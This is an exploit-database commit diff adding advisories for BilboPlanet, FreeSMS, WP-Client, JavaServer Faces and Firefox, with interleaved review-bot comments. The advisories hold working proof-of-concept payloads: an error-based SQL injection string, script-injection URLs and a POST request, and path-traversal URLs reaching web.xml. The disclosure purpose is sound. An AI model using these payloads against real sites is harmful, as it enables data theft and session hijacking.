DB: 2015-11-25
6 new exploits
parent daf16b0803
commit 780a01d850
8 changed files with 129 additions and 6 deletions
@ -35045,6 +35045,7 @@ id,file,description,date,author,platform,type,port
38771,platforms/windows/dos/38771.py,"ShareKM Remote Denial of Service Vulnerability",2013-09-22,"Yuda Prawira",windows,dos,0
38773,platforms/hardware/webapps/38773.txt,"ZTE ZXHN H108N R1A_ ZXV10 W300 Routers - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,0
38781,platforms/php/webapps/38781.txt,"AlienVault Open Source SIEM (OSSIM) 3.1 'date_from' Parameter Multiple SQL Injection Vulnerabilities",2013-10-02,"Yu-Chi Ding",php,webapps,0
38803,platforms/php/webapps/38803.txt,"WP-Client 3.8.7 - Stored XSS Vulnerability",2015-11-24,"Pier-Luc Maltais",php,webapps,80
38782,platforms/php/webapps/38782.php,"WordPress SEO Watcher Plugin 'ofc_upload_image.php' Arbitrary PHP Code Execution Vulnerability",2013-10-03,wantexz,php,webapps,0
38775,platforms/linux/local/38775.rb,"Chkrootkit Local Privilege Escalation",2015-11-20,metasploit,linux,local,0
38776,platforms/cgi/webapps/38776.txt,"Cambium ePMP 1000 - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",cgi,webapps,0
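Review bot: the new row 38803 (WP-Client 3.8.7 Stored XSS, 2015-11-24) is inserted between 38781 and 38782 instead of after 38802 with the other five new rows of this commit, which breaks the ascending id order of files.csv and turns this hunk into a one-line insertion in the middle of 2013-era entries; append it after 38802.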
@ -35058,7 +35059,7 @@ id,file,description,date,author,platform,type,port
38787,platforms/windows/dos/38787.txt,"Acrobat Reader DC 15.008.20082.15957 - PDF Parsing Memory Corruption Vulnerability",2015-11-23,"Francis Provencher",windows,dos,0
38788,platforms/windows/dos/38788.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption Vulnerability",2015-11-23,"Francis Provencher",windows,dos,0
38789,platforms/windows/dos/38789.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption Vulnerability 2",2015-11-23,"Francis Provencher",windows,dos,0
38790,platforms/php/webapps/38790.pl,"vBulletin 5.x - Remote Code Execution Exploit",2015-11-23,"Mohammad Reza",php,webapps,80
38790,platforms/php/webapps/38790.pl,"vBulletin 5.x - Remote Code Execution Exploit",2015-11-23,"Mohammad Reza Espargham",php,webapps,80
38791,platforms/windows/dos/38791.rb,"Audacious 3.7 - ID3 Local Crash PoC",2015-11-23,"Antonio Z.",windows,dos,0
38792,platforms/windows/local/38792.txt,"NVIDIA Stereoscopic 3D Driver Service 7.17.13.5382 - Arbitrary Run Key Creation",2015-11-23,"Google Security Research",windows,local,0
38793,platforms/windows/dos/38793.txt,"Windows ndis.sys IOCTL 0x170034 (ndis!ndisNsiGetIfNameForIfIndex) - Pool Buffer Overflow (MS15-117)",2015-11-23,"Nils Sommer",windows,dos,0
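Review bot: the commit message "6 new exploits" omits the metadata correction in this hunk, which changes the author of 38790 from "Mohammad Reza" to "Mohammad Reza Espargham" (the rendering dropped the +/- markers, so the two 38790 rows are the old and new line, not a duplicate entry); say so in the message. The remaining rows are unchanged context.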
@ -35066,3 +35067,8 @@ id,file,description,date,author,platform,type,port
38795,platforms/windows/dos/38795.txt,"Windows Race Condition DestroySMWP Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0
38796,platforms/windows/dos/38796.txt,"Windows Kernel Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0
38797,platforms/php/remote/38797.rb,"Joomla Content History SQLi Remote Code Execution",2015-11-23,metasploit,php,remote,80
38798,platforms/multiple/dos/38798.txt,"Mozilla Firefox Cookie Verification Denial of Service Vulnerability",2013-04-04,anonymous,multiple,dos,0
38799,platforms/php/webapps/38799.txt,"BilboPlanet 'auth.php' SQL Injection Vulnerability",2013-10-11,"Omar Kurt",php,webapps,0
38800,platforms/php/webapps/38800.txt,"FreeSMS pages/crc_handler.php scheduleid Parameter SQL Injection",2013-09-27,"Sarahma Security",php,webapps,0
38801,platforms/php/webapps/38801.txt,"FreeSMS pages/crc_handler.php Multiple Parameter XSS",2013-09-27,"Sarahma Security",php,webapps,0
38802,platforms/multiple/remote/38802.txt,"Oracle Glassfish Server 2.1.1/3.0.1 Multiple Subcomponent Resource Identifier Traversal Arbitrary File Access",2013-10-15,"Alex Kouzemtchenko",multiple,remote,0
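Review bot: the 38802 description names only "Oracle Glassfish Server 2.1.1/3.0.1", but the 38802.txt added in this commit describes the issue as Oracle JavaServer Faces directory traversal affecting WebLogic Server 10.3.6.0/12.1.1.0, GlassFish Server 2.1.1/3.0.1/3.1.2 and JDeveloper 11.1.2.3.0/11.1.2.4.0/12.1.2.0.0; the title should name JavaServer Faces and the full version list so the entry is found by affected product. The five appended rows 38798 to 38802 otherwise follow the platform/type/port conventions of the surrounding lines.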
11
platforms/multiple/dos/38798.txt
Executable file
@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/62969/info
Mozilla Firefox is prone to a denial-of-service vulnerability because it fails to verify the user supplied input.
Successfully exploiting this issue will allow an attacker to inject special characters into the browser's local cookie storage, resulting in the requested website always responding with an error message which is hosted on specific web server software (like lighttpd). This will cause a denial-of-service condition.
Firefox 19 is vulnerable; other versions may also be affected.
Note: This issue was previously covered in BID 58857 (Google Chrome and Mozilla Firefox Browser Cookie Verification Security Weakness), but has been moved to its own record for better documentation.
http://www.example.com/?utm_source=test&utm_medium=test&utm_campaign=te%05st
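Review bot: the closing URL (`...&utm_campaign=te%05st`) is the only concrete step, but the text never states how a query parameter ends up in the cookie store or which server software, beyond the lighttpd example, returns the persistent error, so the entry is not reproducible as written; add that step or at least point to BID 58857, which the note cites as the original record. The CSV row for 38798 also dates this 2013-04-04 with platform "multiple", while the text only states that Firefox 19 is vulnerable.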
14
platforms/multiple/remote/38802.txt
Executable file
@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/63052/info
Oracle JavaServer Faces is prone to multiple directory-traversal vulnerabilities.
Exploiting these issues may allow an attacker to obtain sensitive information that could aid in further attacks.
This vulnerability affects the following products and versions:
WebLogic Server 10.3.6.0, 12.1.1.0
GlassFish Server 2.1.1, 3.0.1, 3.1.2
JDeveloper 11.1.2.3.0, 11.1.2.4.0, 12.1.2.0.0
http://www.example.com/someApp/javax.faces.resource.../WEB-INF/web.xml.jsf
http://www.example.com/someApp/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
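Review bot: the affected-version list has no matching fixed versions or Oracle advisory reference, so a reader cannot tell which patch closes the two traversal vectors shown (`..` in the resource path and `..` in the `ln` parameter of the `javax.faces.resource` handler, both reaching WEB-INF/web.xml); add the patch reference. The product list here (WebLogic, GlassFish up to 3.1.2, JDeveloper) also disagrees with the CSV description for 38802, which names GlassFish 2.1.1/3.0.1 only.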
@ -8,11 +8,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
# EDB note:
# This line causes an error when loading
# include Msf::Exploit::Remote::HTTP::Wordpress
# Replaced with the following:
include Msf::HTTP::Wordpress
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
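Review bot: the file header for this hunk was lost in rendering, so it is not visible which Metasploit module (.rb) is being edited; name it in the commit message. With the +/- markers also missing, the line count (11 to 7) indicates the four-line "EDB note" comment block and `include Msf::HTTP::Wordpress` are removed and `include Msf::Exploit::Remote::HTTP::Wordpress` is kept, presumably because the framework now provides the mixin under that name. Since the note being deleted says that exact include failed to load, the message should record that the module was confirmed to load against the current framework before the workaround was dropped.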
9
platforms/php/webapps/38799.txt
Executable file
@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/62989/info
BilboPlanet is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://example.com/auth.php
(POST - user_id)
user_id=-1' or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
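Review bot: no affected or fixed BilboPlanet version is stated (the FreeSMS entries 38800 and 38801 in the same commit at least say "FreeSMS 2.1.2 is vulnerable"); add the version tested and the vendor status. The payload is the error-based variant built on COUNT(*) with FLOOR(RAND(0)*2) GROUP BY over INFORMATION_SCHEMA.COLLATIONS, so the remediation to record is a parameterised query for `user_id` in auth.php, not merely suppressing database error output.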
9
platforms/php/webapps/38800.txt
Executable file
@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/63004/info
FreeSMS is prone to multiple cross-site scripting vulnerabilities and an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
Attackers can exploit these issues to execute arbitrary code in the context of the browser, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database; other attacks are also possible.
FreeSMS 2.1.2 is vulnerable; other versions may also be affected.
http://www.example.com/freesms/pages/crc_handler.php?method=evaluation&func=getanswers&scheduleid=15{SQL_HERE}
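Review bot: the descriptive paragraphs are the BID 63004 summary covering both the cross-site scripting and the SQL injection, but this file carries only the `scheduleid` injection point (the XSS vectors are in 38801 from the same commit); trim the text to the SQL injection and cross-reference 38801. `{SQL_HERE}` should be labelled as a placeholder for the injected value rather than left as if it were part of the URL.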
12
platforms/php/webapps/38801.txt
Executable file
12
platforms/php/webapps/38801.txt
Executable file
|
@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/63004/info
FreeSMS is prone to multiple cross-site scripting vulnerabilities and an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
Attackers can exploit these issues to execute arbitrary code in the context of the browser, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database; other attacks are also possible.
FreeSMS 2.1.2 is vulnerable; other versions may also be affected.
http://www.example.com/freesms/pages/crc_handler.php?method=profile&func=%3Cscript%3Ealert%28123%29%3C/script%3E
http://www.example.com/FreeSMS/pages/crc_evaluation.php?crc=diggks5j3mlf6pee6knk34qq60&uid=3&course='"</script><script>alert(document.cookie)</script>
http://www.example.com/FreeSMS/pages/crc_login.php?crc=diggks5j3mlf6pee6knk34qq60&uid='"</script><script>alert(document.cookie)</script>
http://www.example.com/FreeSMS/pages/crc_handler.php?method=register&func=add -> Username -> '"</script><script>alert(document.cookie)</script>
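Review bot: the first URL uses the path `freesms/pages/crc_handler.php` while the next three use `FreeSMS/pages/...`; on a case-sensitive filesystem only one of these resolves, so the paths should be made consistent. The last line (`...method=register&func=add -> Username -> ...`) is a form field, not a URL, and should say so. As with 38800, the intro text repeats the BID 63004 summary including the SQL injection that lives in 38800; keep the XSS part and cross-reference 38800.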
66
platforms/php/webapps/38803.txt
Executable file
@ -0,0 +1,66 @@
#####################################################################################
Application: WP-Client
Version: 3.8.7
Author: Pier-Luc Maltais from COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
One plugin configures multiple areas of your WordPress installation and allows the
site Administrator to easily create new Client Areas, Client Management Portals,
Client Estimates & Invoices, Client File Upload Areas, or Private Staff Pages on the
site by entering just a few data fields. Additionally, clients can upload/download
secure files. (https://wp-client.com/)
============================
2) Report Timeline
============================
12/11/2015 - Found the vulnerability
12/11/2015 - Ticket opened
20/11/2015 - Plugin extension Estimates/Invoices updated (v1.5.2)
24/11/2015 - Public disclosure
============================
3) Technical details
============================
WP-Client is vulnerable to a stored XSS attack in the Request Estimate page. The
extension affected is Estimates/Invoices v1.5.1.
============================
4) POC
============================
Request :
POST /portal/request-estimate/ HTTP/1.1
[...]
wpc_data%5Baction%5D=request&wpc_data%5Btitle%5D=Request+Estimate+from+2015-11-12&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bname%5D=&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bdescription%5D=&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bquantity%5D=1&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bprice%5D=&wpc_data%5Bwpc_inv_message%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
Response :
[...]
<div class="wpc_clear"></div>
<span>Comments:</span><br>
<table id="wpc_inv_table_request_notes" style="width: 100%;">
<tr bgcolor="E0E0E0">
<td><b>client:</b></td>
<td><script>alert(1)</script>
[...]
#####################################################################################
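Review bot: the header line `Version: 3.8.7` refers to WP-Client itself, but the technical details say the affected component is the Estimates/Invoices extension v1.5.1, which the timeline shows fixed in v1.5.2 on 20/11/2015; the Version line and the CSV title "WP-Client 3.8.7 - Stored XSS Vulnerability" should name the extension and the fixed version so readers know what to update. The request/response pair shows `wpc_data[wpc_inv_message]` written unescaped into the Comments cell of `wpc_inv_table_request_notes`, which is the stored XSS; stating that this field must be HTML-escaped on output would make the fix explicit. The timeline uses DD/MM/YYYY dates while the CSV row uses ISO dates.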